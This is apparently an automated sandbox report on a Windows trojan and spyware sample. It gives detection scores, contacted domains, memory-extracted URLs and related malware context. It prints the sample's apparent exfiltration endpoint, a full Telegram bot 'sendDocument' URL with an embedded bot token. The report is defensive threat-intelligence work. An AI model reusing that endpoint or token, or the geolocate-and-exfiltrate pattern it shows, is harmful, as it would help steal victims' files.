Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
R9rwNLVzpr.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
R9rwNLVzpr.exe	79%	Virustotal		Browse
R9rwNLVzpr.exe	100%	Avira	TR/Spy.Agent.wqsdu

Source	Detection	Scanner	Label	Link
http://ns.adobe.hotoshQ	0%	Avira URL Cloud	safe
http://ns.a.0/sTyF	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
get.geojs.io	104.26.1.100	true	false	high
www.google.com	142.250.184.196	true	false	high
api.telegram.org	149.154.167.220	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1325014913.000017D40111C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472286042.000017D401120000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473341101.000017D40137C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://goto.google.com/sme-bugs2e	chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	false		high
https://samplicio.us	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing	chrome.exe, 00000006.00000002.1444442982.000017D40047C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ingereck.net	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/6098869	chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 00000006.00000002.1446905028.000017D400815000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/J	chrome.exe, 00000006.00000002.1472693291.000017D401204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone	chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472463173.000017D401188000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451868980.000017D400CD8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/feature=ytca	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/:	chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://beaconmax.com	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=	chrome.exe, 00000006.00000002.1471284495.000017D400E54000.00000004.00001000.00020000.00000000.sdmp	false		high
https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/	chrome.exe, 00000006.00000002.1448980001.000017D400990000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/:	chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.google.com/chrome?p=desktop_tab_groups	chrome.exe, 00000006.00000002.1444955697.000017D4005D4000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	chrome.exe, 00000006.00000002.1434743725.000002570B307000.00000004.10000000.00040000.00000000.sdmp	false		high
http://dns-tunnel-check.googlezip.net/connect	chrome.exe, 00000006.00000002.1472092769.000017D4010BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1324930257.000017D4010BC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/:	chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://adtrafficquality.google	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/chat/download?usp=chrome_default	chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/tools/feedback/chrome/__submit	chrome.exe, 00000006.00000002.1444412649.000017D400469000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/chat/	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com	chrome.exe, 00000006.00000002.1471554093.000017D400F2C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/J	chrome.exe, 00000006.00000002.1472693291.000017D401204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://calendar.google.com	chrome.exe, 00000006.00000002.1474277586.000017D401560000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1444955697.000017D4005A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1474306449.000017D401570000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1474336202.000017D4015A0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://metro.co.uk	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
http://unisolated.invalid/	chrome.exe, 00000006.00000002.1458270403.000017D400DCC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.google.com/	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/chat/:	chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://a-mo.net	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl	chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	false		high
https://www.google.com/chrome/tips/	chrome.exe, 00000006.00000002.1450386543.000017D400BB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1448714179.000017D400928000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451868980.000017D400CD8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	false		high
http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)	chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1448840253.000017D400958000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447754360.000017D4008BC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://audienceproject.com	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	chrome.exe, 00000006.00000002.1475571259.000017D40174C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1476893883.000017D401854000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/s/notifications/manifest/cr_install.html	chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22	chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000342E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/?feature=ytca	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/browser-tools/	chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/J	chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/forms/u/0/create?usp=chrome_actions	chrome.exe, 00000006.00000002.1449969898.000017D400B2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451762911.000017D400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/u/0/create?usp=chrome_actions	chrome.exe, 00000006.00000002.1449969898.000017D400B2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451762911.000017D400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA	chrome.exe, 00000006.00000002.1451644719.000017D400C4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1449820356.000017D400ACC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1475869923.000017D401770000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.google.com/chromebook?p=app_intent	chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/category/themes	chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 00000006.00000002.1442942072.000017D4000FC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://atomex.net	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://apex-football.com	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u	chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	false		high
https://gunosy.com	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/96817	chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	false		high
https://myaccount.google.com/shielded-email?utm_source=chrome2B	chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k	chrome.exe, 00000006.00000002.1445612446.000017D400740000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/#safe	chrome.exe, 00000006.00000002.1449034116.000017D4009B8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	false		high
https://adsmeasurement.com	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/browser-features/	chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000006.00000002.1449969898.000017D400B2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451762911.000017D400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	false		high
https://eloan.co.jp	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000006.00000002.1472463173.000017D401188000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451868980.000017D400CD8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k	chrome.exe, 00000006.00000002.1445848669.000017D4007D0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	false		high
https://postrelease.com	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl	chrome.exe, 00000006.00000002.1408070259.0000025707AD0000.00000002.00000001.00040000.00000010.sdmp	false		high
http://ns.a.0/sTyF	R9rwNLVzpr.exe, 00000001.00000002.1593415189.000000001E180000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google-ohttp-relay-join.fastly-edge.com/2J	chrome.exe, 00000006.00000002.1442304117.000017D000630000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1310480783.000017D000404000.00000004.00001000.00020000.00000000.sdmp	false		high
https://shared-storage-demo-publisher-a.web.app	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b	chrome.exe, 00000006.00000002.1446905028.000017D400815000.00000004.00001000.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000006.00000002.1449969898.000017D400B2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1451762911.000017D400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	chrome.exe, 00000006.00000002.1443417891.000017D4001D8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/category/extensions	chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp	false		high
https://nexxen.tech	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
http://api.telegram.org	R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2policy	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/	chrome.exe, 00000006.00000002.1444690428.000017D4004E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472637663.000017D4011E8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1448490770.000017D4008EC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://clients4.google.com/chrome-sync	chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/	chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	chrome.exe, 00000006.00000002.1458369665.000017D400DE8000.00000004.00001000.00020000.00000000.sdmp	false		high
http://google.com/	chrome.exe, 00000006.00000002.1442757747.000017D4000A9000.00000004.00001000.00020000.00000000.sdmp	false		high
https://creative-serving.com	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://t.me/	R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000386A000.00000004.00000800.00020000.00000000.sdmp, R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000342E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/installwebapp?usp=chrome_default	chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	false		high
https://open-bid.com	chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/J	chrome.exe, 00000006.00000002.1473564721.000017D401404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.unicode.org/copyright.html	chrome.exe, 00000006.00000002.1398486061.0000025705D16000.00000002.00000001.00040000.0000000E.sdmp	false		high
https://drive.google.com/drive/installwebapp?usp=chrome_default	chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000006.00000002.1472579155.000017D4011C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1472372477.000017D401158000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1442942072.000017D4000FC000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ns.adobe.hotoshQ	R9rwNLVzpr.exe, 00000001.00000002.1593415189.000000001E180000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	chrome.exe, 00000006.00000002.1458369665.000017D400DE8000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.184.196	www.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.26.1.100	get.geojs.io	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1635501
Start date and time:	2025-03-11 18:10:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	R9rwNLVzpr.exe renamed because original name is a hash value
Original Sample Name:	02d192483999e1acbe80fa6ee612b56d8768033a6018c9a5b95199943c82e683.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/6@4/4
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.206, 142.250.181.227, 142.250.185.78, 66.102.1.84, 20.42.73.29, 23.60.203.209, 23.199.214.10, 4.175.87.197, 150.171.27.10, 20.190.159.131, 2.19.122.21
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, g.bing.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
13:11:34	API Interceptor	33x Sleep call for process: R9rwNLVzpr.exe modified
13:11:46	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	nobtpajdjthawd.exe	Get hash	malicious	Keyzetsu Clipper	Browse
	KoaguarLoader.exe	Get hash	malicious	Salat Stealer, XWorm	Browse
	Solara Executor.exe	Get hash	malicious	XWorm	Browse
	RFQ.exe	Get hash	malicious	DarkCloud	Browse
	http://magazinescontest.ct.ws/en/3	Get hash	malicious	HTMLPhisher	Browse
	https://rebrand.ly/8fca12	Get hash	malicious	HTMLPhisher	Browse
	#rfq=O250116 - #U304a#U3088#U3073#U8cfc#U5165#U5951#U7d04- Offer Z01G-00008D SUPPLY - H64PO.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO202503S.xlsm	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	New Order RFQ- 19A20060.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	ja811MqV4h.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse
104.26.1.100	install.exe	Get hash	malicious	Unknown	Browse	get.geojs.io/v1/ip/geo.json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
get.geojs.io	cndx.com.eml	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.1.100
	9JJKvVwvGx.exe	Get hash	malicious	Destiny Stealer, Phemedrone Stealer, StormKitty	Browse	172.67.70.233
	http://l0gin-check-acc0unt-metta-pagefb3464354674.xyz/live?432432432	Get hash	malicious	Unknown	Browse	104.26.1.100
	https://shorten.is/@viewnow4571953	Get hash	malicious	Unknown	Browse	172.67.70.233
	https://shorten.ee/businesspage-helpcenter	Get hash	malicious	HTMLPhisher	Browse	104.26.0.100
	http://alert-account-verify.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	104.26.1.100
	SecuriteInfo.com.Trojan.Siggen21.26995.20995.13619.exe	Get hash	malicious	Phemedrone Stealer, XWorm	Browse	172.67.70.233
	Demande de proposition du MRC TRANSPORT INC.pdf	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.26.0.100
	E4WGhv6WDA.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.26.1.100
	https://www.google.co.in/url?sa==qIZ4swYptEFjlFb1dUJMku8qkwo&rct=Tv6rwg5An5qVEcj21pbPddiYJMafw8MzCgW3o2BGMPiZkz1mDFVbk3KN5uvdm3gJdq&sa=t&url=amp/bortolassi.tajuamani.com./kkiq/lkik/gmLlwATlt4DqqG3BBbYOk/YmVydC53aWxrZXJzb25AbXlmbG9yaWRhcHJlcGFpZC5jb20=	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.26.0.100
api.telegram.org	nobtpajdjthawd.exe	Get hash	malicious	Keyzetsu Clipper	Browse	149.154.167.220
	KoaguarLoader.exe	Get hash	malicious	Salat Stealer, XWorm	Browse	149.154.167.220
	Solara Executor.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	RFQ.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	http://magazinescontest.ct.ws/en/3	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://rebrand.ly/8fca12	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	#rfq=O250116 - #U304a#U3088#U3073#U8cfc#U5165#U5951#U7d04- Offer Z01G-00008D SUPPLY - H64PO.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO202503S.xlsm	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	New Order RFQ- 19A20060.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ja811MqV4h.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	nobtpajdjthawd.exe	Get hash	malicious	Keyzetsu Clipper	Browse	149.154.167.220
	biyhoksefdad.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	YuQuLoader.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	KoaguarLoader.exe	Get hash	malicious	Salat Stealer, XWorm	Browse	149.154.167.220
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Solara Executor.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	RFQ.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	http://magazinescontest.ct.ws/en/3	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	publicpublicpublic.xll.ps1	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	https://rebrand.ly/8fca12	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
CLOUDFLARENETUS	expense-report.xlsx	Get hash	malicious	KnowBe4	Browse	104.21.96.1
	https://www.bsdnetworks.com/products/bsd-industrial-5-10-100tx-port-ethernet-switch-mini/	Get hash	malicious	Unknown	Browse	104.21.27.152
	ScreenSync.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
	vktyhkakwdrg.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	https://nr.sssage.top/	Get hash	malicious	Unknown	Browse	104.21.75.61
	nbtypsfikkad.exe	Get hash	malicious	Xmrig	Browse	104.20.3.235
	dawothjkjad.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	nogtpjadthaw.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.212.102
